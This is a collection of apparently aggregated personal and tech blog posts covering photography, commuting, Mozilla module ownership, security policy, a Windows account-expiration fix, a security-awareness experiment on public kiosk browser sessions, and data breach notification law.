In the past few months I have started making the transition from reading on my computer monitor to physical books, simply because my eyes can not handle the strain of focusing on the monitor for hours. After reading a good deal of computer related books I have started to realize an annoying pattern, authors and book publishers are trying to appeal to the wrong demographic. It does not matter how technical a subject may be, the author still attempts to write it from a home user perspective.

While reading Server Technologies chapter in The Complete Reference: Networking the author goes on to discuss how servers are no different than workstations! The author suggests that you should buy a workstation and use it as a server because the differences come down to servers simply lacking audio and video cards, have higher prices, and lack the free peripherals! Here are some fun quotes from the chapter

“The question then remains, what you do get when you purchase a server for more money than you would spend on a workstation with the same processor and a comparable amount of memory and disk space?”

“Although servers generally do not come equipped with high-end video and audio adapters, there is usually no reason why you can’t add them later and use the computer for tasks more traditionally associated with client workstations.”

This is not about me not liking some book and deciding that I should rant about it. Overlap of home and enterprise technologies exists in majority of books that are not directly published by the software or hardware manufacturers. The reader does not buy a reference book on networking to read about networking topologies, routing protocols, and how to convert their home PC into a server! Instead the reader wants an insight into an industry, platform, hardware, or software that is not readily available to them. In other words, when buying a 500+ page book on firewalls, I am not buying it to read about Zone Alarm. In fact, Zone Alarm and Cisco PIX should not be mentioned in the same chapter.

I am now becoming one of those people that hangs around Barnes & Noble for hours, reading chapters from random books before making a purchase.

Waiting for water to boil

Originally uploaded by tenshi_cr

So I decided to join the PhotoChallenge group on Flickr. The group basically chooses a subject each month and you basically would upload a photo everyday sticking to the subject.
The idea of these challenges is to make you get better at taking photographs. This is my first entry into May’s challenge. The theme will be different objects and it will get changed each week. This week is beverages and I’ve decided to stick with tea this week.
One of the areas I’m not that good at and definitely need improvement is in low light environments.

-LM

Well, there was apparently a small manhole fire just east of the Christopher Street station in Manhattan today. Depending on which news report you believe, it supposedly started underneath a PATH train! All of the passengers were evacuated, and there were no injuries.

Anyhow, what does this have to do with me? I take the PATH in order to commute to Manhattan when the job requires it. Today was such a day that I had to work in our lower Manhattan office, nowhere near to where this commotion occurred. However, there was a NYLUG meeting this evening, which happens in midtown. It's easiest (I think) for me to take the PATH from midtown when I'm in midtown. Makes sense. Good thing that I knew the service was shut down ahead of the meeting in midtown, so I knew that was a no-go. Everyone was saying "Wow, we feel really sorry for the folks that live in Jersey, they're gonna have one heck of a commute tonight". Fearing the worst, I took the NYC subway down to the WTC PATH station, and hopped on the train there. I think that they had increased service frequency to that station as much as they could, since there was a train waiting for me at 10PM, and it left shortly thereafter (with the train operator telling everyone that was getting on the train that there were plenty of seats in the rear of the train - problem being everyone needed to be towards the front because of where they were going). The train got quickly underway, and I think that I got into the subway at 9:45PM or something similar, and I got out of my station in NJ at 10:20PM. 35 minutes is not a bad commute for NYC, especially since I took a massive detour from where I was in order to get home. There are people that would kill for that commute, and that's what I get when everything's messed up. So I guess this PATH commuter had some good luck!

It's unclear whether or not this will be repaired for the morning rush, so I'm planning to leave a little early since the route that I take is the only one operating between NJ and NY, and I'm expecting more crowding on the already jam-packed train. Good thing the customer meeting wars relocated (for unrelated reasons) from midtown to downtown! :)

Almost four weeks ago now¹, dbaron took some time and separated out the various guts of the old Mozilla tools module, and divvied the contents of the directory² into two new Mozilla modules: a Build & Release Tools module and a Code Analysis and Debugging Tools module.

I wanted to call this change out, because I think it's a step in the right direction, for a lot of reasons; both of these new modules have seen a lot more activity in the last 2-3 years and I think it really helps to separate them out from a code management standpoint, but also from the standpoint of the way we think about these sets of tools: the guts of any organization's build/release infrastructure and analysis/debugging tools should be first-rate citizens, and this change helps to frame the way those parts of the code are thought about.

So, thank you, dbaron; it's been a long time coming, and I appreciate you taking the time to sort that goop of code all out into [more] logical units.

*** A couple of days after the announcement, I brought up the fact that with Rob Helmer's announcement, the Build & Release module would not have anyone at Mozilla Corporation who could offer reviews for the module, given that rhelmer, Chase and myself were listed as the owners, and there weren't any peers yet.

This obviously makes little-to-no sense.

After a lively discussion about how to best remedy that, I also wanted to note that long-time Mozilla community member Nick Thomas³ is the new module owner for the Build/Release Tools module, with Chase, Rob Helmer, and myself staying around as peers.

Coop was also added as a module peer, whose omission was, let's face it, somewhat ludicrous⁴. I'm happy to see that got corrected as well.

Congratulations, Nick; you follow a long line of Mozilla Build Engineers, and I know you're going to [continue to] hit it out of the ballpark.

Let me know where to send the bottle of scotch.

_____________________
¹ Wow... on my birthday, no less! What a present! :-)
² which had mostly become an "island of misfit code"
³ also known as the "Build Engineer Formerly Known as CF"
⁴ No one escapes Mozilla Build/Release, Coop. No one. ;-)

For those of us in higher education; do not forget that the EDUCAUSE/Internet2 Security Professionals Conference will take place starting this Sunday (May 3). If anyone is going there and would like to meet up, please drop me a note! I'll be getting in Saturday evening around 8pm or so.

The things time causes

Originally uploaded by tenshi_cr

Someone asked me today if I had contacts in Law Enforcement in The Netherlands. As a matter of fact, I do. The guy (who I only know by his online alias, and "met" only once) wanted me to contact them so I could inform them of a warez site that he knew about, and of a web site that was defaced by the person who operates that site.

However, when I asked the person for some evidence to back up his claims, he went quiet. All he told me that "he knew about, but was not connected to the site that was defaced". Obviously, it ended right there for me.

It does make you wonder: why does anyone think that I would go to anyone (let alone a law enforcement officer) with a message like: hey, this guy I never met, or have any idea who he really is, would like you to crack down on a site that he claims hosts illegal stuff, but for which he cannot provide any corroborating evidence?

Uhuh.

There is one thing that some people think and that is that the more expensive the camera the better the photos that person takes and this is not the case since the camera is only a tool that, like every other tool, needs to be used correctly to achieve the desired results. I must agree that the better the tool the better the result and taking photos with a camera phone, for example, is not something you would compare with those photos taken with a Nikon D3.

There is one phrase that I’ve heard and and probably have mentioned it here a couple of times and that is that the camera doesn’t make the photographer. Given the right usage of the tool you can actually achieve great photos or snapshots and many professional photographers as well as hobbyist and enthusiasts have shown this to be true in numerous blogs and contests that have been carried out.

One of these photographers is Jeff Ascough where he takes a Sony Ericsson K800i and goes out to take some photos then takes them into the Digital Darkroom and touches them up to make them look better, you can see them on his post Camera Phones.

I’ve agreed with this phrase and these photographers since most of my great shots have been taken with my point-and-shoot camera.

-LM

A 0day with an automatic discovery and dissemination tool shouldn't be a surprise to anyone. The fact that it's hit hundreds of thousands of sites in less than a couple of weeks is slightly surprising, though it mainly means that the bad guys are moving fast. Is this just the next step in Internet security, where we have new 0day vulnerabilities sweeping through web servers on a regular basis?
Source: Network Security Blog

Observations like this once more seem to reconfirm that the bad guys are increasingly focusing on OSI layer 7 and above. While not to be ignored, simply putting up a firewall to keep unwanted traffic out, and an IDS to make sure the firewall is working well (or an IPS, if you prefer) is not sufficient.
While hardening systems by applying patches (operating system, as well as all applications) and limiting servers to only provide services that are required remains critical to limit your technical exposure, malicious traffic traveling on legitimate channels remains effective.

So what can be done? It is essential that deciding what is desired behavior when it comes to using information is done ahead of time. Users must be educate about proper use of information technology. Processes that use our information must be designed in a way that they reasonably prevent undesired use, and that they behave predictably when they fail. We must develop an enterprise architecture that supports our processes effectively and efficiently. We must put monitoring controls in place to detect when (not if!) our preventative controls fail. We must be prepared and know how to respond when those failures are detected. Bottom line?

1. Develop and maintain information security policy
2. Design and maintain business processes
3. Develop and maintain user awareness
4. Develop and maintain an enterprise architecture that is aligned with the business processes
5. Implement a technical infrastructure based on the enterprise architecture
6. Monitor processes and infrastructure for signs of failure
7. Respond to incidents
8. Go to 1.

xkcd has an excellent comic up today. The title is Zealous Autoconfig. Here it is:

Please respect their license.

Originally uploaded by tenshi_cr

My parents arrived last night from their trip to Panama, which unfortunately I was unable to go, and along with the UV Filter I had asked them to buy for me they brought me a new Nikkor 70-300mm G lens.
To test the range of this lens I went over to the terrace in my house and took this shot of the seesaw in the children’s playground across the street. This shot was taken with the focal length of 300mm and my tripod since the lens doesn’t have the VR, camera shake reduction technology from Nikon, that my 18-55mm has. I attempted to take some shots with the lens by simply holding the camera but they didn’t come out since my hand is a bit shaky and despite my tries at stabilizing the camera it would still blur the shot.
Since I don’t have a remote control for the camera then I set the timer to 5s to take the steady shot and this works so I’ll be sticking to it until I can buy the control.
I have also taken and posted on Flickr a couple of shots from the playground, using my 18-55mm lens, that I took today. All the images have been retouched in Adobe Photoshop CS3 and using Kubota’s actions as well as other presets that I got for Adobe Lightroom.

-LM

I ran into a problem yesterday with my Windows installation. Since this is a laptop that is not part of an Active Directory Domain, has the Administrator account disabled and only has one other local account with Local Admin privileges, I ran into a problem when Windows informed me that my account had expired.

The problem is that I had a whole bunch of EFS-encrypted files in that account, without having backed up the EFS-certificate. The only option that I thought would provide me with a quick fix was to reboot from a Backtrack CD to re-enable the Administrator account and blow out the password on the Administrator account. Removing the account of the other user would not have worked, but even worse, it would have made all my EFS-encrypted files unavailable.

After having regained access to the Administrator account, I started messing around with clicking on all kinds of stuff, and even playing with some wmic-voodoo.

All to no avail.

As with most operating systems, Windows separates account expiration from password expiration. Resetting the password expiration was easy, but resetting the account expiration on a stand-alone Windows machine does not seem to be possible with out-of-the-box Windows tools. Even a tweet for attention did not yield the result I was looking for.

After doing quite some head-banging and even more research, I found a command-line tool called AccExp. AccExp can set or reset the account expiration of a local windows user, or a user in an Active Directory.

Lesson 1: If using EFS. backup your certificate. Instructions.
Lesson 2: Account expiration cannot be reset using and out-of-the-box Windows. Additional tools, such as AccExp are required.
Lesson 3: Windows will not expire an account while you are logged in; even going to standby/hibernate does not include an account expiration check. Windows will only check when you log on to an account.

PS: Yes, I know this Windows laptop is configured pretty much as far removed from best-practices as possible.

Operations Analysis and Research Center for the Internet (OARCI) will hold it’s third annual DNS Operations Workshop at Brooklyn College this upcoming June. Registration is now open, and you do not have to be a member of OARCI to attend the workshop! Check out OARCI DNS Operations Workshop website for more information!

The world outside sleeps

Originally uploaded by tenshi_cr

I attempted to shoot a good long exposure of the moon last night since it looked pretty good but since I was attempting to do it from inside the house the window caused for the shot to not have enough detail and come out messed up.
I pointed the camera to the horizon and took a long exposure shot using my tripod and the camera timer set to 5seconds to avoid camera shake.
Afterwards I used Adobe Lightroom to process the RAW file and to create a PSD file that I would use in Adobe Photoshop CS3 to add a couple of effects to the foto using the actions that I recently obtained.

-LM

One of my responsibilities is security awareness training, and I am currently in the process of establishing a baseline. This will allow me to evaluate the effectiveness of any future efforts that I am going to develop. Whenever you embark on something like implementing a new program, make sure that you establish baselines. Without them, you will have no way to evaluate the effectiveness of your efforts. But, I digress.

Today, I re-confirmed that most attacks against IT infrastructure are just too simple to pull off when the attacker targets the users, rather than the technology. Today, I did an experiment using low-tech methods.

I went down to some public terminals, typically used by students when they have some time to kill. Whenever someone left their terminal, I walked over to see what I could find. Most were smart enough to close their browsers before they left, but very few went so far to clear their browser's cache, or even actually log out of the application they were using.

Most web applications use a session-based cookie to authenticate a user and to establish a context. That session will be destroyed automatically when the last window of a browser closes. A well-written web application will then require the user to re-authenticate themselves. Note that many web applications are friendly enough that they will cache the user's identity, even across sessions. The login field is typically already populated, providing an attacker with useful information.

These particular kiosks are iMacs. Macs are interesting things in that windows completely disappear when they are minimized, except of course when you know where to look. I initiated by attack by starting an instance of Safari and an instance of Firefox, and I minimized both.

Next, I walked away from the browser and let students use the kiosk. Those students did their thing (usually browsing Facebook or MySpace) and then closed their window, but not their browser. As a result, the session states were maintained and I had full access to accounts logged in to these social networking sites, and even the occasional Google Checkout or eBay account.

Of course, I immediately logged the user out  when I established that she was logged in and after I had taken a photo of the screen. I also made sure not to capture (or even look at) any personally identifiable information.

Please note that our policies allowed me to do this. My job function requires me to monitor the use of IT resources, and to establish information security program, and establishing a baseline is part of that process. While connected to our network, or while using equipment that we own, no user has a "reasonable expectation of privacy.

How do you defend against this? Clear "private data" when you leave a browser in a public space. This will not defend against key loggers, but it will make it a lot harder for people to hijack your session.

Another thing that I found interesting is that nobody approached me to find out what I was doing there. I was very open about the fact that I would walk immediately over after someone left, play with their browser, and even take photos of their screen using the camera built-in to my cell phone.

I recently had the opportunity to talk to Josh Weiss, who works with Partners in Solidarity. Partners in Solidarity was founded by Matthew Rutman with the vision of bringing computers and technical education to the rural schools and NGO's of the Guatemalan state of Quetzaltenango. The project facilitates the donation of computers, supplied by Next Step Recycling in Eugene, Oregon, to allow for

Interesting.

ESI is running an article about a potential information disclosure at Southern Connecticut State University.

Southern Connecticut State University has alerted current and former students after a review of a university web site discovered a vulnerability that could have allowed an unauthorized individual access to personal information. During a recent review of a web server, the university discovered that unauthorized individuals could have had access to applications for graduation dating back to 2002.
Source: ESI press release

What I find interesting in this is that the university chose to notify students, while there does not seem to be proof of a disclosure, just a vulnerability that could potentially have been abused. All affected students (past and current) are offered two years of credit watch.
Even if a vulnerability was exploited on a server that also contained that information, notification might not be required:

Connecticut breach notification law states:

Any person who conducts business in this state, and who, in the ordinary course of such person's business, owns, licenses or maintains computerized data that includes personal information, shall disclose any breach of security following the discovery of the breach to any resident of this state whose personal information was, or is reasonably believed to have been, accessed by an unauthorized person through such breach of security.
Source: CT notification law

The next question becomes: when is it reasonably believed to have been accessed? Most compromised web applications that I have seen were exploited for defacement, to host malware, or to host other illegal content. Hardly ever were they used to go after other data that is stored on them. This is especially the case for Universities, who are typically on high-bandwidth pipes.

What is the implication for other institutions if it becomes common practice to notify when a vulnerability has been identified, without there being any signs of an actual breach? While it commendable that Southern State University is taking such a transparent and pro-active position, the decision to do so may have been taken too quickly.

It is same to assume that at least half of all web application that are currently in use have some form of vulnerability in them. If all organizations that deploy such applications have to start notifying their users that program may contain vulnerabilities that could be exploited to possibly gain unauthorized access to information, we might as well pull the plug and sit in our corners until we learn to develop applications that are 100% secure. I do not see that happening any time soon.

I am a very big advocate of privacy and due care. However, I cannot help but feel that this notification is a bit premature. I would also be very interested to see if any research has been done to find out how many times people that have been put on credit watch after a breach have actually become a victim of identity theft, and of those victims, how many can actually be tied to the unintended disclosure.

Breach notification laws are a good thing, because they make us look after our data a lot better, but I cannot feel that we cry wolf much too often.